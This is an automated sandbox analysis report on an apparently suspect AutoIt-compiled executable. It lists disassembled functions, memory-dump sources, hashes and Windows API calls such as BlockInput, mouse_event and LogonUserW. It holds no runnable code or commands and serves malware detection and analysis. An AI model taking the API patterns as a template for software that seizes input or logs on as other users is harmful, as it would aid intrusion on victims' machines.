                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharUpper
                                                                                • String ID: G
                                                                                • API String ID: 3964851224-2567791629
                                                                                • Opcode ID: d2f620db457f9e7c6d43193cd5a86868b3f89b75f0baa166f4f3e0c4c94f946e
                                                                                • Instruction ID: 15e4b34fbe695f7510104a4e923728e58931ea34b3f2e6f23ecbc4f0a44f228c
                                                                                • Opcode Fuzzy Hash: d2f620db457f9e7c6d43193cd5a86868b3f89b75f0baa166f4f3e0c4c94f946e
                                                                                • Instruction Fuzzy Hash: FE9279706083419FD726DF18C480F6ABBE5BF88308F14885EE98A8B762D775ED45CB52
                                                                                Function 003DD1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5916b6ec152937a18d1f6561c683e7750130d367010cbda37654dfa55229b933
                                                                                • Instruction ID: 73f2c0f402afaf0264b1c6cfd438a526fdff604ce337ee16870a4698b13ac586
                                                                                • Opcode Fuzzy Hash: 5916b6ec152937a18d1f6561c683e7750130d367010cbda37654dfa55229b933
                                                                                • Instruction Fuzzy Hash: CD322422D69F014DD7239634E922336A298AFB73C4F55D737F819B5EAAEB29C4834104
                                                                                Function 003B96C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: __itow__swprintf
                                                                                • String ID:
                                                                                • API String ID: 674341424-0
                                                                                • Opcode ID: 772d732c77822b94d41795fc8b5b92871791b920be8bdfd96123e013eaf569ea
                                                                                • Instruction ID: d064d8fadf099ba3d2db1e7ff894c28d1452ab0b3a59266ed653a297809a8b6c
                                                                                • Opcode Fuzzy Hash: 772d732c77822b94d41795fc8b5b92871791b920be8bdfd96123e013eaf569ea
                                                                                • Instruction Fuzzy Hash: 6D22BD716083119FD726DF14C891BAFB7E4AF84308F10491EFA9A8B691DB75ED44CB82
                                                                                Function 003E038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b9158f3ac1e9d173dfc2dcb69fa3e6b0369e29b6654e645eb8f4907bf95e6ca8
                                                                                • Instruction ID: 61518d506b891588433e20ade3d44f34268803dfaf1df3cfbe88cc555f02010d
                                                                                • Opcode Fuzzy Hash: b9158f3ac1e9d173dfc2dcb69fa3e6b0369e29b6654e645eb8f4907bf95e6ca8
                                                                                • Instruction Fuzzy Hash: ECB1F128D2AF514ED72397398831336B65CAFBB2D5F91D72BFC1A74D62EB2185834180
                                                                                Function 003FB6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __time64.LIBCMT ref: 003FB6DF
                                                                                  • Part of subcall function 003D344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,003FBDC3,00000000,?,?,?,?,003FBF70,00000000,?), ref: 003D3453
                                                                                  • Part of subcall function 003D344A: __aulldiv.LIBCMT ref: 003D3473
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Time$FileSystem__aulldiv__time64
                                                                                • String ID:
                                                                                • API String ID: 2893107130-0
                                                                                • Opcode ID: 82c65d79e67b24f73d441f8a80f2fae1f62fc87e6c1fae1b0ecac0348e624905
                                                                                • Instruction ID: 009a69bb2ee54ac68744a7a500287614e1cc298f84a1084ebda772e3212f565c
                                                                                • Opcode Fuzzy Hash: 82c65d79e67b24f73d441f8a80f2fae1f62fc87e6c1fae1b0ecac0348e624905
                                                                                • Instruction Fuzzy Hash: 3C2163726345108BC72ACF28D481A52F7E1EB95311B248E7DE4E5CF280CB74A945DB54
                                                                                Function 00406AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • BlockInput.USER32(00000001), ref: 00406ACA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: BlockInput
                                                                                • String ID:
                                                                                • API String ID: 3456056419-0
                                                                                • Opcode ID: a076d804c551d692255aa01bb743747a4ce444addb01f1987392ae75e3c63981
                                                                                • Instruction ID: 9087ee8c52a1a59d4cef463ea978d7a7c881bb809dcc08f5dea9c08281302544
                                                                                • Opcode Fuzzy Hash: a076d804c551d692255aa01bb743747a4ce444addb01f1987392ae75e3c63981
                                                                                • Instruction Fuzzy Hash: DEE012353102046FC700EB69D405D96B7ECAFA5761B05C426E946DB291DAB4F8048B90
                                                                                Function 003F74BB Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 003F74DE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: mouse_event
                                                                                • String ID:
                                                                                • API String ID: 2434400541-0
                                                                                • Opcode ID: 87af0530ebf188b2bb5f77aa054c8e9b901fbf55bb2213f9e6366d10f2b0eb8e
                                                                                • Instruction ID: 41968caaee5f5651769476d6bbcebe1ee7d4f0fe865a13d37d8466b4800aa3d4
                                                                                • Opcode Fuzzy Hash: 87af0530ebf188b2bb5f77aa054c8e9b901fbf55bb2213f9e6366d10f2b0eb8e
                                                                                • Instruction Fuzzy Hash: CAD05EA1A2C30D38EC2B07269C0FF760909F3007C0F829189B382C94C1F88058019032
                                                                                Function 003EB106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,003EAD3E), ref: 003EB124
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: LogonUser
                                                                                • String ID:
                                                                                • API String ID: 1244722697-0
                                                                                • Opcode ID: b5d1bcd6a73a8651d1d5dbf4f22c04e0855f95587316deac96eb211caeeec3dc
                                                                                • Instruction ID: f11088939f19f6b203382c902f9ee53db45a0b50bf3e4ecf288be4629d3fea0e
                                                                                • Opcode Fuzzy Hash: b5d1bcd6a73a8651d1d5dbf4f22c04e0855f95587316deac96eb211caeeec3dc
                                                                                • Instruction Fuzzy Hash: 6BD05E320A460EAEEF024FA4EC02EAE3F6AEB04B00F408110FA11D50A0C771D531AB50
                                                                                Function 0042B340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: NameUser
                                                                                • String ID:
                                                                                • API String ID: 2645101109-0
                                                                                • Opcode ID: 2f99750264d5c82ea9135e2287b19a558ab66b57b885e915ff79179257fa5aed
                                                                                • Instruction ID: 5bbca8e797d559c815518163ebd5dbb058411289e3e65e95dbced15f7443ba05
                                                                                • Opcode Fuzzy Hash: 2f99750264d5c82ea9135e2287b19a558ab66b57b885e915ff79179257fa5aed
                                                                                • Instruction Fuzzy Hash: BCC04CB1800119DFC755DFC0D9449EEB7BCAB08705F105092A105F2110D7749B459B76
                                                                                Function 003D8189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32(?), ref: 003D818F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                • Opcode ID: da3538e1f34e28049255b6ddf318fb2bd60eaef1784ca25404bb13595d4064ea
                                                                                • Instruction ID: b10e7b4f29c81a67395139566b21c5a8fcf026447e74f25d36c92ae0f8aad260
                                                                                • Opcode Fuzzy Hash: da3538e1f34e28049255b6ddf318fb2bd60eaef1784ca25404bb13595d4064ea
                                                                                • Instruction Fuzzy Hash: B3A0113000020CAB8F002B82FC088883F2CEB002A0B000030F80C000208B22A8208A8A
                                                                                Function 003B93F0 Relevance: .5, Instructions: 531COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cde255432f47ff19ca2c0b9f350e136bb3fd014040f25ca0b01526de57591eed
                                                                                • Instruction ID: c548714d1d53419b6b8f3a665bd5d209ccb930db438c7f1b0de194a61b0d2278
                                                                                • Opcode Fuzzy Hash: cde255432f47ff19ca2c0b9f350e136bb3fd014040f25ca0b01526de57591eed
                                                                                • Instruction Fuzzy Hash: 8D12CD70A00209AFDF15DFA5DA81AEEB7F5FF48304F10452AE906E7650EB79AD10CB54
                                                                                Function 003BE3E3 Relevance: .5, Instructions: 521COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 46298cd544ce4a48c0567b4223d4152fab3ed49af600b2e52708b79f46134e5e
                                                                                • Instruction ID: 34c3b87301b09fa05c2e13ced0f9ce9cc3de77d04c3d5291e7599b6368a5e577
                                                                                • Opcode Fuzzy Hash: 46298cd544ce4a48c0567b4223d4152fab3ed49af600b2e52708b79f46134e5e
                                                                                • Instruction Fuzzy Hash: 5C12DF70A04215CFCB26DF58C480BFAB7B1FF14308F15816ADA5AABB51E735AD81CB91
                                                                                Function 003BAF50 Relevance: .5, Instructions: 514COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Exception@8Throwstd::exception::exception
                                                                                • String ID:
                                                                                • API String ID: 3728558374-0
                                                                                • Opcode ID: 9273b77f64ceca52aec2cb51444043d9b9ba5d5c85759c257787ef4d7027e5ee
                                                                                • Instruction ID: 0faf8b24c08ec32cbc97cf3da4fe2cff83669a7e09aac781a9a749e17a2aa224
                                                                                • Opcode Fuzzy Hash: 9273b77f64ceca52aec2cb51444043d9b9ba5d5c85759c257787ef4d7027e5ee
                                                                                • Instruction Fuzzy Hash: 0602C0B0A00109EFCF15DF68D981AAEBBB5FF48304F10806AE906DF255EB75DA11CB95
                                                                                Function 003D02A4 Relevance: .3, Instructions: 345COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                • Instruction ID: 7afe2147472ef662006fd6b88f6bd8b4667a2c86d8dbbc9e7771e445b1253761
                                                                                • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                • Instruction Fuzzy Hash: 95C1C8372051970EDF1F463A9434A3EBAA15A92BB171B076ED8B3CB5D5EF20C924D720
                                                                                Function 003D06D9 Relevance: .3, Instructions: 341COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                • Instruction ID: 2e8ff7cdc8880be0f7d6c32a86a0cb78477b7b92492b8201ac5a9f9ff96d8d64
                                                                                • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                • Instruction Fuzzy Hash: 6EC1B2332051970DDF6E463A943463EBAA15AA2BB171B076ED4B3CF6D5EF20C924D720
                                                                                Function 003CFA57 Relevance: .3, Instructions: 323COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                • Instruction ID: 1a38dde02c414cbd8334b1d3ca2320e0e10df6e99b1511d813967395619644c8
                                                                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                • Instruction Fuzzy Hash: 33C17F322050970DDB2E463A8474A3EBAA25AA2BB531B177DD4B3CB5D5EF20CD64D720
                                                                                Function 0040A2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DeleteObject.GDI32(00000000), ref: 0040A2FE
                                                                                • DeleteObject.GDI32(00000000), ref: 0040A310
                                                                                • DestroyWindow.USER32 ref: 0040A31E
                                                                                • GetDesktopWindow.USER32 ref: 0040A338
                                                                                • GetWindowRect.USER32(00000000), ref: 0040A33F
                                                                                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0040A480
                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0040A490
                                                                                • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0040A4D8
                                                                                • GetClientRect.USER32(00000000,?), ref: 0040A4E4
                                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040A51E
                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0040A540
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0040A553
                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0040A55E
                                                                                • GlobalLock.KERNEL32(00000000), ref: 0040A567
                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0040A576
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040A57F
                                                                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0040A586
                                                                                • GlobalFree.KERNEL32(00000000), ref: 0040A591
                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0040A5A3
                                                                                • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0043D9BC,00000000), ref: 0040A5B9
                                                                                • GlobalFree.KERNEL32(00000000), ref: 0040A5C9
                                                                                • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0040A5EF
                                                                                • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0040A60E
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0040A630
                                                                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0040A81D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                • API String ID: 2211948467-2373415609
                                                                                • Opcode ID: 957d01b49f942f67372b4a4147d5446b8d237bacc2170c12fac8ee782e780f84
                                                                                • Instruction ID: e8c32653d34b58c2be073d118fd9a6b84329b7d8b7bd5d0bc3327a779b81fef5
                                                                                • Opcode Fuzzy Hash: 957d01b49f942f67372b4a4147d5446b8d237bacc2170c12fac8ee782e780f84
                                                                                • Instruction Fuzzy Hash: B9028875900204AFDB14DFA8DD89EAE7BB9FF48314F048169F915AB2A0D734ED41CB68
                                                                                Function 0041D285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetTextColor.GDI32(?,00000000), ref: 0041D2DB
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0041D30C
